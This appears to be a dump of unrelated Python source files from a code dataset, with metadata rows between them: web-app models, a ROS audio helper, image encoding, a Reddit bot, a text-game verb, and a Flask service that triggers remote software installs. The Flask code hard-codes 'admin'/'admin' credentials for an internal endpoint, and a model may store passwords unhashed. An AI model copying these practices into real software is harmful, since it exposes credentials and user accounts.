    # Marks the "currently active" entry (e.g. current job/education).
    current = Column(Boolean, default=False)
class DeletedMixin(object):
    # Soft-delete flag; rows are flagged rather than removed.
    deleted = Column(Boolean, default=False, nullable=True)
class User(Base, BaseMixin, TimestampMixin):
    # Account credentials and tier flags.
    # NOTE(review): `password` is stored as given here; confirm it is hashed
    # before assignment elsewhere in the app.
    username = Column(String, index=True)
    password = Column(String, index=True)
    is_admin = Column(Boolean, default=False)
    is_premium = Column(Boolean, default=False)

    # One-to-one profile, removed together with the user.
    profile = relationship(
        "UserProfile", cascade="all,delete", back_populates="user", uselist=False
    )

    def __str__(self):
        return f"<User: {self.username}>"
class Template(Base, BaseMixin, TimestampMixin):
    # Resume template: rendered `content`, gated by the `premium` flag.
    name = Column(String, index=True)
    content = Column(Text)
    premium = Column(Boolean, default=False, index=True)

    # Profiles currently using this template.
    user_profiles = relationship("UserProfile", back_populates="template")

    def __str__(self):
        return f"<Template: {self.name}>"
#TODO Add Portfolio, and Social medias - Linkedin etc to userprofile
class UserProfile(Base, BaseMixin, TimestampMixin):
    # Public-facing resume data for one user.
    first_name = Column(String)
    last_name = Column(String)
    public_name = Column(String)
    summary = Column(String)
    email = Column(String)
    phone = Column(String)
    designation = Column(String)
    website = Column(String, nullable=True)

    # Owning user and the chosen rendering template.
    user_id = Column(UUID(as_uuid=True), ForeignKey("user.id"))
    template_id = Column(UUID(as_uuid=True), ForeignKey("template.id"))
    user = relationship("User", back_populates="profile")

    # Resume sections; all are removed with the profile and eager-loaded.
    skills = relationship(
        "Skill", cascade="all,delete", back_populates="profile", lazy="joined"
    )
    jobs = relationship(
        "Job", cascade="all,delete", back_populates="profile", lazy="joined"
    )
    educations = relationship(
        "Education", cascade="all,delete", back_populates="profile", lazy="joined"
    )
    certifications = relationship(
        "Certification", cascade="all,delete", back_populates="profile", lazy="joined"
    )
    template = relationship("Template", back_populates="user_profiles", lazy="joined")

    def __str__(self):
        return f"<Profile: {self.first_name} {self.last_name}>"
class Skill(Base, BaseMixin, DeletedMixin):
    # A skill entry; `learning` marks skills still being acquired.
    name = Column(String, index=True)
    learning = Column(Boolean, default=False)

    profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
    profile = relationship("UserProfile", back_populates="skills")

    def __str__(self):
        return f"<Skill: {self.name}>"
class Job(Base, BaseMixin, CurrentMixin, DeletedMixin):
    # Work-history entry; `enddate` is null while the job is ongoing.
    company = Column(String, index=True)
    designation = Column(String, index=True)
    description = Column(Text)
    startdate = Column(String)
    enddate = Column(String, nullable=True)

    profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
    profile = relationship("UserProfile", back_populates="jobs")

    def __str__(self):
        return f"<Job: {self.company}>"
class Education(Base, BaseMixin, CurrentMixin, DeletedMixin):
    # Education entry; `enddate` is null while the study is ongoing.
    college = Column(String, index=True)
    designation = Column(String)
    description = Column(Text)
    startdate = Column(String)
    enddate = Column(String, nullable=True)

    profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
    profile = relationship("UserProfile", back_populates="educations")

    def __str__(self):
        return f"<Education: {self.college}>"
class Certification(Base, BaseMixin, CurrentMixin, DeletedMixin):
    # Professional certification; expiry/credential fields are optional.
    name = Column(String, index=True)
    issuing_organization = Column(String)
    issue_date = Column(String)
    expiration_date = Column(String, nullable=True)
    credential_id = Column(String, nullable=True)
    credential_url = Column(String, nullable=True)

    profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
    profile = relationship("UserProfile", back_populates="certifications")

    def __str__(self):
        return f"<Certification: {self.name}>"
| 32.042254 | 86 | 0.705934 | 514 | 4,550 | 6.095331 | 0.22179 | 0.103415 | 0.043409 | 0.053623 | 0.421002 | 0.313438 | 0.282796 | 0.23428 | 0.175551 | 0.175551 | 0 | 0.000265 | 0.171429 | 4,550 | 141 | 87 | 32.269504 | 0.830769 | 0.024176 | 0 | 0.22 | 0 | 0 | 0.122463 | 0 | 0 | 0 | 0 | 0.007092 | 0 | 1 | 0.08 | false | 0.01 | 0.07 | 0.08 | 0.89 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfaff810f8ad02f15def8943b57bf4630603e431 | 1,597 | py | Python | python_src/tbd_audio_common/sound_maker.py | CMU-TBD/tbd_audio_common | 5afdaccbf1e5c8ad038ce849844cd85e846b8927 | [
"MIT-CMU",
"MIT"
] | null | null | null | python_src/tbd_audio_common/sound_maker.py | CMU-TBD/tbd_audio_common | 5afdaccbf1e5c8ad038ce849844cd85e846b8927 | [
"MIT-CMU",
"MIT"
] | null | null | null | python_src/tbd_audio_common/sound_maker.py | CMU-TBD/tbd_audio_common | 5afdaccbf1e5c8ad038ce849844cd85e846b8927 | [
"MIT-CMU",
"MIT"
] | null | null | null | #!/usr/bin/env python
import rospy
import alloy.ros
import os
import wave
import actionlib
from tbd_ros_msgs.msg import (
playAudioAction,
playAudioGoal
)
class SoundMaker():
    """Thin wrapper around the tbd_audio 'playAudio' actionlib server used
    to play bundled sound effects (currently just a beep)."""

    def __init__(self):
        # Blocks until the playAudio action server is reachable.
        self._tbd_audio_client = actionlib.SimpleActionClient("playAudio", playAudioAction)
        self._tbd_imported_playAudioGoal = playAudioGoal
        self._tbd_audio_client.wait_for_server()
        # Resource directory containing the bundled .wav files.
        self._res_dir = alloy.ros.get_res_path('tbd_audio_common')

    def play_beep(self, block=True):
        # Load the beep sample.
        waveFile = wave.open(os.path.join(self._res_dir,'beep.wav'))
        # NOTE(review): this is frames * sample width, i.e. a byte count, yet
        # it is passed to readframes() which expects a frame count (harmless
        # over-read) and stored in goal.size -- confirm the server expects bytes.
        num_of_frames = waveFile.getnframes() * waveFile.getsampwidth()
        # Build the goal: raw audio bytes, sample rate and size.
        goal = playAudioGoal()
        goal.soundFile = waveFile.readframes(num_of_frames)
        goal.rate = int(waveFile.getframerate())
        goal.size = num_of_frames
        # Send to the action server, optionally waiting for completion.
        if block:
            self._tbd_audio_client.send_goal_and_wait(goal)
        else:
            self._tbd_audio_client.send_goal(goal)

    def wait(self, duration=None):
        """
        Wait for the sound to finish. Note, sometimes the last few seconds of the speech will still be playing when it ends

        Parameters
        ----------
        duration : rospy.Duration
            Ros's implementation of Duration
        """
        # Only wait if a goal handle exists, i.e. something was ever sent.
        if self._tbd_audio_client.gh:
            if duration is not None:
                result = self._tbd_audio_client.wait_for_result(duration)
            else:
                result = self._tbd_audio_client.wait_for_result()
| 29.574074 | 123 | 0.644333 | 195 | 1,597 | 4.994872 | 0.441026 | 0.057495 | 0.086242 | 0.129363 | 0.155031 | 0.155031 | 0.075975 | 0.075975 | 0 | 0 | 0 | 0 | 0.271133 | 1,597 | 53 | 124 | 30.132075 | 0.83677 | 0.166562 | 0 | 0.0625 | 0 | 0 | 0.026128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.21875 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb19827d57787b285507d6f0c699802654b2f05 | 1,474 | py | Python | webserver/ProjetoSS.py | jonnyff/Outliers_NASA-Space-Apps | 2713bad7df491e1c32ef2657f4e7e868c3e3777b | [
"Apache-2.0"
] | null | null | null | webserver/ProjetoSS.py | jonnyff/Outliers_NASA-Space-Apps | 2713bad7df491e1c32ef2657f4e7e868c3e3777b | [
"Apache-2.0"
] | null | null | null | webserver/ProjetoSS.py | jonnyff/Outliers_NASA-Space-Apps | 2713bad7df491e1c32ef2657f4e7e868c3e3777b | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request, render_template
from flask import json
from requests.auth import HTTPBasicAuth
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Serve the install form; on POST, trigger the HPE OO flow that installs
    the chosen program on the requesting client machine."""
    # Fix: requests.post was called but only requests.auth was imported at
    # module level, so every POST raised NameError. Import locally here.
    import requests

    if request.method == 'POST':
        ipcliente = request.remote_addr
        programa = request.form['programa']
        cmdchrome = "C:\ChromeSetup.exe /silent /install"
        cmdnotepad = "C:\\npp.6.9.2.Installer.exe /S"
        comando = ""
        programafonte = ""
        if programa == "googlechrome":
            comando = cmdchrome
            programafonte = "C:\ChromeSetup.exe"
        elif programa == "notepad":
            comando = cmdnotepad
            programafonte = "C:\\npp.6.9.2.Installer.exe"
        # Payload expected by the OO flow (source installer, client IP, command).
        mensagem = {
            'flowUuid': '3864e244-3ff8-4553-a5b4-38d6e5689744',
            'inputs': {
                'programafonte': programafonte, 'ipcliente': ipcliente, 'comando': comando}
        }
        # NOTE(review): hard-coded credentials and endpoint; move to config/secrets.
        r = requests.post('http://10.88.0.122:8080/oo/rest/v2/executions/',
                          data=json.dumps(mensagem),
                          auth=HTTPBasicAuth('admin', 'admin'), headers={'Content-Type': 'application/json'})
        print(r.text)
        return render_template('index.html')
    else:
        return render_template('index.html')
if __name__ == "__main__":
    # Set the host/port the server should bind to. Example: app.run(host='192.168.0.1', port='8080')
    app.run(host="noruega.unit.br", port="80")
| 35.095238 | 109 | 0.591588 | 163 | 1,474 | 5.251534 | 0.588957 | 0.049065 | 0.035047 | 0.014019 | 0.11215 | 0.044393 | 0.044393 | 0 | 0 | 0 | 0 | 0.053456 | 0.263908 | 1,474 | 41 | 110 | 35.95122 | 0.735484 | 0.069878 | 0 | 0.060606 | 0 | 0 | 0.260584 | 0.065693 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.090909 | 0 | 0.181818 | 0.030303 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb4a6fbb8d580b5d2075aecbe9dbd0aeb08ff0b | 3,232 | py | Python | scripts/vramc/encoder.py | paulscottrobson/6502-basic | d4c360041bfa49427a506465e58bb0ef94beaa44 | [
"MIT"
] | 3 | 2021-09-30T19:34:11.000Z | 2021-10-31T06:55:50.000Z | scripts/vramc/encoder.py | paulscottrobson/6502-Basic | d4c360041bfa49427a506465e58bb0ef94beaa44 | [
"MIT"
] | null | null | null | scripts/vramc/encoder.py | paulscottrobson/6502-Basic | d4c360041bfa49427a506465e58bb0ef94beaa44 | [
"MIT"
] | 1 | 2021-12-07T21:58:44.000Z | 2021-12-07T21:58:44.000Z | # *****************************************************************************
# *****************************************************************************
#
# Name: encoder.py
# Author: Paul Robson (paul@robsons.org.uk)
# Date: 27th March 2021
# Purpose: Encode graphics
#
# *****************************************************************************
# *****************************************************************************
from palette import *
from PIL import Image
# *****************************************************************************
#
# Encode graphics object worker
#
# *****************************************************************************
class ImageEncoder(object):
    """Converts PIL images into palette-indexed pixel data."""

    def __init__(self):
        pass

    #
    # Encode one image.
    #
    def encode(self, image, palette, is4Bit, reqWidth, reqHeight):
        """Encode *image* against *palette* at reqWidth x reqHeight.

        Transparent pixels (alpha <= 64) become 0xF0 in 4-bit mode (sprite
        transparent) or 0x00 otherwise. In 4-bit mode the result is packed
        two pixels per byte.
        """
        image = image.convert("RGBA")
        # Resize only if the source does not already match the target size.
        if (image.width, image.height) != (reqWidth, reqHeight):
            image = self.resizeImage(image, reqWidth, reqHeight)
        # Map every pixel to its nearest palette entry, row by row.
        transparent = 0xF0 if is4Bit else 0x00
        data = []
        for row in range(reqHeight):
            for col in range(reqWidth):
                pixel = image.getpixel((col, row))
                if pixel[3] > 64:
                    data.append(self.findBest(palette, is4Bit, pixel))
                else:
                    data.append(transparent)
        # Optional debug dump of the encoded rows (disabled).
        if False:
            for row in range(reqHeight):
                start = row * reqWidth
                print("".join("${0:02x}".format(c) for c in data[start:start + reqWidth]))
        # Pack nibble pairs in 4-bit mode.
        return self.crunch(data) if is4Bit else data

    #
    # Crunch 8 bit to 4 bit.
    #
    def crunch(self, inp):
        """Pack pairs of sprite-palette indices (0xF0-0xFF) into single
        bytes of two 4-bit nibbles."""
        packed = []
        for pos in range(0, len(inp), 2):
            hi, lo = inp[pos], inp[pos + 1]
            assert 0xF0 <= hi <= 0xFF
            assert 0xF0 <= lo <= 0xFF
            packed.append(((hi & 0xF) << 4) | (lo & 0xF))
        return packed

    #
    # Find best pixel for given rgb value (0-255 range)
    #
    def findBest(self, palette, is4Bit, pixel):
        """Return the palette index whose 4-bit-per-channel RGB is closest
        (squared distance) to *pixel*; 4-bit mode searches only the sprite
        palette (indices 241-255)."""
        want = [palette.byteToNibble(channel) for channel in pixel[:3]]
        bestScore = None
        bestPixel = None
        for candidate in range(241 if is4Bit else 1, 256):
            rgb = palette.get(candidate)
            have = ((rgb >> 8) & 0xF, (rgb >> 4) & 0xF, (rgb >> 0) & 0xF)
            score = sum((w - h) * (w - h) for w, h in zip(want, have))
            if bestScore is None or score < bestScore:
                bestScore = score
                bestPixel = candidate
        assert bestPixel is not None
        return bestPixel

    #
    # Resize image maintaining aspect ratio
    #
    def resizeImage(self, img, w, h):
        """Scale *img* to fit within (w, h) keeping aspect ratio, centred
        on a transparent canvas when the aspect ratios differ."""
        scale = min(w / img.width, h / img.height)      # smaller scale fits both axes
        scaledW = int(img.width * scale + 0.5)
        scaledH = int(img.height * scale + 0.5)
        img = img.resize((scaledW, scaledH), resample=Image.BILINEAR)
        if (img.width, img.height) != (w, h):
            canvas = Image.new("RGBA", (w, h), 0)       # centre on new image
            canvas.paste(img, (int(w / 2 - img.width / 2), int(h / 2 - img.height / 2)))
            img = canvas
        return img
if __name__ == "__main__":
    # Manual smoke test: encode mario.png with the sprite palette, 8-bit mode.
    palette = Palette()
    palette.setSpritePalette()
    #
    image = Image.open("mario.png")
    #
    encoder = ImageEncoder()
    enc = encoder.encode(image,palette,False,32,32)
| 28.350877 | 107 | 0.534963 | 411 | 3,232 | 4.177616 | 0.377129 | 0.016308 | 0.013978 | 0.012813 | 0.024461 | 0.024461 | 0 | 0 | 0 | 0 | 0 | 0.030385 | 0.195545 | 3,232 | 113 | 108 | 28.60177 | 0.63 | 0.299196 | 0 | 0.029851 | 0 | 0 | 0.014885 | 0 | 0 | 0 | 0.017591 | 0 | 0.044776 | 1 | 0.074627 | false | 0.014925 | 0.029851 | 0 | 0.179104 | 0.014925 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb5034780b879d1244f12e00e78645edb6abd45 | 2,541 | py | Python | torchaudio/__init__.py | micmelesse/audio | e8cc7f9130135e8ab96d58b0225d5120da6a0804 | [
"BSD-2-Clause"
] | null | null | null | torchaudio/__init__.py | micmelesse/audio | e8cc7f9130135e8ab96d58b0225d5120da6a0804 | [
"BSD-2-Clause"
] | 1 | 2021-08-31T22:20:32.000Z | 2021-08-31T22:20:32.000Z | torchaudio/__init__.py | micmelesse/audio | e8cc7f9130135e8ab96d58b0225d5120da6a0804 | [
"BSD-2-Clause"
] | null | null | null | from torchaudio._internal import module_utils as _mod_utils # noqa: F401
if _mod_utils.is_module_available('torchaudio._torchaudio'):
# Note this import has two purposes
# 1. Make _torchaudio accessible by the other modules (regular import)
# 2. Register torchaudio's custom ops bound via TorchScript
#
# For 2, normally function calls `torch.ops.load_library` and `torch.classes.load_library`
# are used. However, in our cases, this is inconvenient and unnecessary.
#
# - Why inconvenient?
# When torchaudio is deployed with `pex` format, all the files are deployed as a single zip
# file, and the extension module is not present as a file with full path. Therefore it is not
# possible to pass the path to library to `torch.[ops|classes].load_library` functions.
#
# - Why unnecessary?
# When torchaudio extension module (C++ module) is available, it is assumed that
# the extension contains both TorchScript-based binding and PyBind11-based binding.*
# Under this assumption, simply performing `from torchaudio import _torchaudio` will load the
# library which contains TorchScript-based binding as well, and the functions/classes bound
# via TorchScript become accessible under `torch.ops` and `torch.classes`.
#
# *Note that this holds true even when these two bindings are split into two library files and
# the library that contains PyBind11-based binding (`_torchaudio.so` in the following diagram)
# depends on the other one (`libtorchaudio.so`), because when the process tries to load
# `_torchaudio.so` it detects undefined symbols from `libtorchaudio.so` and will automatically
# loads `libtorchaudio.so`. (given that the library is found in a search path)
#
# [libtorchaudio.so] <- [_torchaudio.so]
#
#
from torchaudio import _torchaudio # noqa
else:
import warnings
warnings.warn('torchaudio C++ extension is not available.')
from torchaudio import (
compliance,
datasets,
functional,
models,
kaldi_io,
utils,
sox_effects,
transforms,
)
from torchaudio.backend import (
list_audio_backends,
get_audio_backend,
set_audio_backend,
)
try:
from .version import __version__, git_version # noqa: F401
except ImportError:
pass
__all__ = [
'compliance',
'datasets',
'functional',
'models',
'kaldi_io',
'utils',
'sox_effects',
'transforms',
'list_audio_backends',
'get_audio_backend',
'set_audio_backend',
]
| 35.291667 | 98 | 0.709957 | 326 | 2,541 | 5.40184 | 0.423313 | 0.03975 | 0.034072 | 0.034072 | 0.128336 | 0.128336 | 0.128336 | 0.128336 | 0.128336 | 0.074957 | 0 | 0.0065 | 0.212908 | 2,541 | 71 | 99 | 35.788732 | 0.874 | 0.610783 | 0 | 0 | 0 | 0 | 0.193312 | 0.022989 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.026316 | 0.184211 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb6340fbbc7e56129c9bfe9ba48fe36ac1730fd | 900 | py | Python | Aprendendo Python/cursopythonudamy/aula24_operadorternario.py | JlucasS777/Aprendendo-Python | a3a960260070f0d604c27fbbc41578a6ab11edb5 | [
"MIT"
] | null | null | null | Aprendendo Python/cursopythonudamy/aula24_operadorternario.py | JlucasS777/Aprendendo-Python | a3a960260070f0d604c27fbbc41578a6ab11edb5 | [
"MIT"
] | null | null | null | Aprendendo Python/cursopythonudamy/aula24_operadorternario.py | JlucasS777/Aprendendo-Python | a3a960260070f0d604c27fbbc41578a6ab11edb5 | [
"MIT"
] | null | null | null | # Operador Ternário
'''login_user = False
if login_user : # isso é o mesmo que if login_user == True:
msg = 'Usuário logado'
else:
msg = 'Usuário precisa logar'
print(msg)
print(i)'''
''' O código acima é o mesmo que :
'''
# login_user = False
# msg ='Usuário logado.'if login_user else ' Usuário precisa logar'
# print(msg)]
print('Seja bem-vindo ao programa sua idade , agora você vai saber se é adulto ou não \n '
'Para sair do program escolha uma idade maior que 120\n')
while True:
idade = input('Qual a sua idade :')
if not idade.isnumeric():
print( 'Você precisa digitar apenas números')
else:
idade=int(idade)
if idade > 120 :
print('Fim do programa')
break
if idade < 120 :
usario = 'Você é maior de idade'if idade >= 18 else 'Usuario menor de idade, vá brincar de durmir '
print(usario) | 30 | 111 | 0.628889 | 133 | 900 | 4.218045 | 0.496241 | 0.080214 | 0.058824 | 0.035651 | 0.114082 | 0.114082 | 0 | 0 | 0 | 0 | 0 | 0.016743 | 0.27 | 900 | 30 | 112 | 30 | 0.837139 | 0.314444 | 0 | 0 | 0 | 0 | 0.472855 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb69b8488c9035534337b7d04075f3c5e669cc8 | 471 | py | Python | images_of/entrypoints/bot.py | amici-ursi/ImagesOfNetwork | a8922c24b7e2b0df50282842ebb0998a3cb7d60a | [
"MIT"
] | 12 | 2016-04-23T23:24:44.000Z | 2018-09-17T04:07:56.000Z | images_of/entrypoints/bot.py | amici-ursi/ImagesOfNetwork | a8922c24b7e2b0df50282842ebb0998a3cb7d60a | [
"MIT"
] | 90 | 2016-04-10T06:12:23.000Z | 2017-07-24T14:15:38.000Z | images_of/entrypoints/bot.py | amici-ursi/ImagesOfNetwork | a8922c24b7e2b0df50282842ebb0998a3cb7d60a | [
"MIT"
] | 9 | 2016-04-24T21:30:21.000Z | 2020-06-15T13:45:12.000Z | import click
from images_of import command, settings, Reddit
from images_of.bot import Bot
@command
@click.option('--no-post', is_flag=True, help='Do not post to reddit.')
def main(no_post):
    """Reddit Network scraper and x-poster bot."""
    user_agent = '{} v6.0 /u/{}'.format(settings.NETWORK_NAME,
                                        settings.USERNAME)
    reddit = Reddit(user_agent)
    reddit.oauth()
    bot = Bot(reddit, should_post=not no_post)
    bot.run()
if __name__ == '__main__':
    main()  # allow running this module directly as a script
| 22.428571 | 71 | 0.615711 | 67 | 471 | 4.104478 | 0.567164 | 0.065455 | 0.087273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005602 | 0.242038 | 471 | 20 | 72 | 23.55 | 0.764706 | 0.084926 | 0 | 0 | 0 | 0 | 0.122353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb6e0c1a847c2bc7fe17d92901369d447464178 | 4,740 | py | Python | server/architext/verbs/edit_world.py | JimenaAndrea/architext | fb49624f7301902a357815af0ca5d320cfc6ddb6 | [
"MIT"
] | 3 | 2020-08-02T07:14:25.000Z | 2021-04-25T12:22:53.000Z | server/architext/verbs/edit_world.py | JimenaAndrea/architext | fb49624f7301902a357815af0ca5d320cfc6ddb6 | [
"MIT"
] | 130 | 2020-07-15T12:09:30.000Z | 2021-05-27T15:02:01.000Z | server/architext/verbs/edit_world.py | JimenaAndrea/architext | fb49624f7301902a357815af0ca5d320cfc6ddb6 | [
"MIT"
] | 1 | 2021-06-10T15:51:49.000Z | 2021-06-10T15:51:49.000Z | from . import verb
import textwrap
from .. import entities
import architext.strings as strings
class EditWorld(verb.Verb):
    """Interactive verb that lets a world creator edit its settings.

    Implemented as a small state machine: ``process`` forwards each
    client message to ``self.current_process_function``; every handler
    sends the next prompt and advances that pointer until the
    interaction finishes. Sending '/' cancels at any point.
    """

    command = _('editworld')
    permissions = verb.CREATOR

    def __init__(self, session):
        super().__init__(session)
        # World being edited, cached once for the whole interaction.
        self.world = self.session.user.room.world_state.get_world()
        self.option_number = None
        self.current_process_function = self.process_first_message

    def process(self, message):
        # '/' is the universal escape that aborts the interaction.
        if message == '/':
            self.session.send_to_client(strings.cancelled)
            self.finish_interaction()
        else:
            self.current_process_function(message)

    def process_first_message(self, message):
        """Show the edit menu and wait for an option number."""
        title = _('Editing this world: "{world_name}"').format(world_name=self.world.name)
        body = _(
            'Enter the number of the value you want to edit.\n'
            ' 0 - Name\n'
            ' 1 - Make public/private\n'
            ' 2 - Edit freedom'
        )
        out_message = strings.format(title, body, cancel=True)
        self.session.send_to_client(out_message)
        self.current_process_function = self.process_option_number

    def process_option_number(self, message):
        """Dispatch on the menu option the user picked."""
        try:
            message = int(message)
        except ValueError:
            self.session.send_to_client(strings.not_a_number)
            return

        # Prompt text and follow-up handler for every menu entry.
        options = {
            0: {
                "out_message": _('Enter the new name:'),
                "next_process_function": self.process_new_world_name,
            },
            1: {
                "out_message": _(
                    'This world is {actual_value}.\n'
                    'Do you want to change it to {new_value}? [yes/no]'
                ).format(
                    actual_value=(strings.public if self.world.public else strings.private),
                    new_value=(strings.public if not self.world.public else strings.private)
                ),
                "next_process_function": self.process_public_choice,
            },
            2: {
                "out_message": _(
                    'Who should be able to edit the world?\n'
                    ' 0 - All users.\n'
                    ' 1 - Only you and your designated editors.'
                ),
                "next_process_function": self.process_edit_freedom_option,
            }
        }

        try:
            chosen_option = options[message]
        except KeyError:
            self.session.send_to_client(strings.wrong_value)
            return

        self.session.send_to_client(chosen_option["out_message"])
        self.current_process_function = chosen_option["next_process_function"]

    def process_new_world_name(self, message):
        """Rename the world to the (non-empty) message."""
        if not message:
            self.session.send_to_client(strings.is_empty)
            return
        # Fixed for consistency with the other handlers: reuse the world
        # cached in __init__ instead of fetching it again, confirm to the
        # client before finishing, and drop the dead trailing return.
        self.world.name = message
        self.world.save()
        self.session.send_to_client(_("The name has been successfully changed."))
        self.finish_interaction()

    def process_public_choice(self, message):
        """Toggle the world's public/private flag on a yes answer."""
        if message.lower() in strings.yes_input_options:
            try:
                self.world.toggle_public()
            except entities.PublicWorldLimitReached:
                self.session.send_to_client(_('You have reached the limit of public worlds in this server. Try to make another world private or ask the admin to increase your limit.'))
                self.finish_interaction()
                return
            self.session.send_to_client(_('This world is now {public_or_private}.').format(public_or_private=(strings.public if self.world.public else strings.private)))
            self.finish_interaction()
        elif message.lower() in strings.no_input_options:
            self.session.send_to_client(_('OK. The world remains {public_or_private}').format(public_or_private=(strings.public if self.world.public else strings.private)))
            self.finish_interaction()
        else:
            self.session.send_to_client(_('Please enter "yes" or "no".'))

    def process_edit_freedom_option(self, message):
        """Choose whether everyone or only designated editors may edit."""
        if message == '0':
            self.session.user.room.world_state.get_world().set_to_free_edition()
            self.session.send_to_client(_("Everybody can edit this world now."))
            self.finish_interaction()
        elif message == '1':
            self.session.user.room.world_state.get_world().set_to_privileged_edition()
            self.session.send_to_client(_("Only your designated editors and you can edit this world now."))
            self.finish_interaction()
        else:
            self.session.send_to_client(strings.wrong_value)
bfb7c5fc2640cb5beb6e90cd007956cfc19c4d95 | 569 | py | Python | count_and_say.py | lutianming/leetcode | 848c7470ff5fd23608cc954be23732f60488ed8a | [
"MIT"
] | null | null | null | count_and_say.py | lutianming/leetcode | 848c7470ff5fd23608cc954be23732f60488ed8a | [
"MIT"
] | null | null | null | count_and_say.py | lutianming/leetcode | 848c7470ff5fd23608cc954be23732f60488ed8a | [
"MIT"
] | null | null | null | class Solution:
# @return a string
def countAndSay(self, n):
say = '1'
for i in range(n-1):
say = self._count_say(say)
return say
def _count_say(self, s):
curr = None
count = 0
say = ""
for c in s:
if c == curr:
count += 1
else:
if curr:
say += str(count)+str(curr)
curr = c
count = 1
say += str(count)+str(curr)
return say
# Ad-hoc smoke test: prints the 4th term of the sequence ('1211').
s = Solution()
print(s.countAndSay(4))
| 21.884615 | 47 | 0.420035 | 68 | 569 | 3.455882 | 0.382353 | 0.034043 | 0.093617 | 0.119149 | 0.153191 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020134 | 0.476274 | 569 | 25 | 48 | 22.76 | 0.768456 | 0.02812 | 0 | 0.181818 | 0 | 0 | 0.001815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.227273 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfb7d3cf4eee3e62630ca9d2b93475cfa95338cc | 2,510 | py | Python | src/1-prepare/cmftools/cmf_fldmap_downscale.py | DirkEilander/compound_hotspots | f9d7960633be80e8e24d2f2563df367cc3f060c6 | [
"BSD-3-Clause"
] | 1 | 2022-01-17T07:02:13.000Z | 2022-01-17T07:02:13.000Z | src/1-prepare/cmftools/cmf_fldmap_downscale.py | DirkEilander/compound_hotspots | f9d7960633be80e8e24d2f2563df367cc3f060c6 | [
"BSD-3-Clause"
] | null | null | null | src/1-prepare/cmftools/cmf_fldmap_downscale.py | DirkEilander/compound_hotspots | f9d7960633be80e8e24d2f2563df367cc3f060c6 | [
"BSD-3-Clause"
] | 1 | 2022-01-17T02:48:28.000Z | 2022-01-17T02:48:28.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import os
from os.path import join, dirname, realpath, basename
import rasterio
import click
import glob
import subprocess
import xarray as xr
import pandas as pd
from datetime import timedelta
from rasterio.transform import from_origin
@click.command()
@click.argument('ddir')
@click.argument('area')
@click.argument('time')
@click.option('-p', '--postfix', default='')
def downscale(ddir, area, time, postfix='', dt=-1):
    # Downscale a coarse flood-depth field (flddph) for one date to the
    # high-resolution grid of <area> using the external downscale_flddph
    # tool, then write the result as a GeoTIFF next to the input data.
    # NOTE(review): `dt` is not exposed as a click option, so the default
    # day-shift of -1 is always applied -- confirm this is intended.

    # parse time
    t = pd.to_datetime(time)
    # read regions info (west/north/csize/nx/ny per high-res area)
    sdir = dirname(realpath(__file__))
